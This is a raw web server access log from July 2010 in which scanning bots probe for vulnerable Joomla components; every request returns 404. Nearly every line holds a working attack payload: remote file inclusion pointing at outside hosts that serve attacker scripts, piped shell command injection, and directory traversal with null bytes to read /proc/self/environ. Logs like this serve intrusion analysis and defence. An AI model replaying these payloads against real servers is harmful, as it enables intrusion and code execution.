203.105.83.126 - - [26/Jul/2010:08:35:12 +0200] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 327 "-" "Jcomers Bot Scan"
203.105.83.126 - - [26/Jul/2010:08:35:12 +0200] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 322 "-" "Jcomers Bot Scan"
203.105.83.126 - - [26/Jul/2010:08:35:33 +0200] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 322 "-" "Jcomers Bot Scan"
203.105.83.126 - - [26/Jul/2010:08:35:33 +0200] "GET /logs/access_log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 338 "-" "Jcomers Bot Scan"
203.105.83.126 - - [26/Jul/2010:08:35:33 +0200] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 327 "-" "Jcomers Bot Scan"
74.81.81.17 - - [26/Jul/2010:08:40:08 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:40:08 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:40:08 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:40:08 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:40:08 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:40:09 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:41:04 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:41:04 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:41:04 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:41:05 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:41:09 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:41:09 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:42:01 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:42:01 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:42:01 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:42:01 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:42:01 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:42:01 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
121.78.118.123 - - [26/Jul/2010:08:43:50 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:08:43:50 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:08:43:51 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
62.141.52.11 - - [26/Jul/2010:08:44:03 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:44:03 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:44:08 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:44:08 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:44:10 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:44:15 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
67.139.30.87 - - [26/Jul/2010:08:44:19 +0200] "GET /logs/access_log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 349 "-" "Mozilla/5.0"
67.139.30.87 - - [26/Jul/2010:08:44:19 +0200] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 331 "-" "Mozilla/5.0"
67.139.30.87 - - [26/Jul/2010:08:44:19 +0200] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 336 "-" "Mozilla/5.0"
67.139.30.87 - - [26/Jul/2010:08:44:20 +0200] "GET /logs/access_log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 349 "-" "Mozilla/5.0"
67.139.30.87 - - [26/Jul/2010:08:44:20 +0200] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 336 "-" "Mozilla/5.0"
67.139.30.87 - - [26/Jul/2010:08:44:20 +0200] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 331 "-" "Mozilla/5.0"
74.81.81.17 - - [26/Jul/2010:08:45:13 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:45:13 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
114.108.151.149 - - [26/Jul/2010:08:45:48 +0200] "GET /logs/access_log//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:45:48 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:45:49 +0200] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
91.208.211.151 - - [26/Jul/2010:08:47:50 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:47:50 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:47:50 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:48:05 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:48:05 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:48:05 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:53:02 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:53:02 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:53:02 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:53:02 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:53:03 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
74.81.81.17 - - [26/Jul/2010:08:53:03 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:55:04 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:55:05 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:57:01 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:57:01 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:57:01 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:57:01 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:57:01 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:57:04 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:57:04 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:57:04 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:08:57:04 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:57:23 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:57:23 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:57:23 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:59:01 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:59:01 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:59:03 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:59:03 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:59:03 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:08:59:03 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:59:07 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:59:07 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:59:07 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:59:15 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:59:15 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:08:59:15 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:22 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:22 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:22 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:22 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:22 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
212.92.13.125 - - [26/Jul/2010:09:01:22 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
114.108.151.149 - - [26/Jul/2010:09:01:36 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:09:01:36 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:09:01:37 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
205.234.145.217 - - [26/Jul/2010:09:05:35 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
62.141.52.11 - - [26/Jul/2010:09:09:35 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:09:35 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:09:35 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:09:40 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:09:40 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:09:41 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
205.234.145.217 - - [26/Jul/2010:09:13:36 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:09:13:36 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:09:13:36 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
83.93.131.189 - - [26/Jul/2010:09:14:11 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 326 "-" "libwww-perl/5.805"
62.141.52.11 - - [26/Jul/2010:09:14:13 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:14:13 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:14:13 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:14:18 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:14:18 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:14:18 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:09:17:03 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:09:17:04 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:09:18:00 +0200] "GET /logs/access_log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:31:09 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
62.141.52.11 - - [26/Jul/2010:09:31:15 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
202.160.123.72 - - [26/Jul/2010:09:48:18 +0200] "GET /logs/access_log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:09:48:24 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:09:48:25 +0200] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
91.208.211.151 - - [26/Jul/2010:09:48:41 +0200] "GET //index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:09:48:41 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:09:48:41 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
91.208.211.151 - - [26/Jul/2010:09:48:56 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
83.93.131.189 - - [26/Jul/2010:09:51:06 +0200] "GET /logs/access_log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 342 "-" "libwww-perl/5.805"
83.93.131.189 - - [26/Jul/2010:09:51:06 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 326 "-" "libwww-perl/5.805"
83.93.131.189 - - [26/Jul/2010:09:51:06 +0200] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 331 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:09:59:45 +0200] "GET /logs/access_log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:09:59:45 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:09:59:49 +0200] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
62.182.63.46 - - [26/Jul/2010:10:03:38 +0200] "GET /logs//components/com_fabrik/libs/Blowfish/ECB.php?mosConfig.absolute.path=http://server.cyber-town.ch/components/com_virtuemart/test.txt?? HTTP/1.1" 404 336 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
62.182.63.46 - - [26/Jul/2010:10:03:38 +0200] "GET //components/com_fabrik/libs/Blowfish/ECB.php?mosConfig.absolute.path=http://server.cyber-town.ch/components/com_virtuemart/test.txt?? HTTP/1.1" 404 331 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
99.198.108.74 - - [26/Jul/2010:10:30:18 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:30:18 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
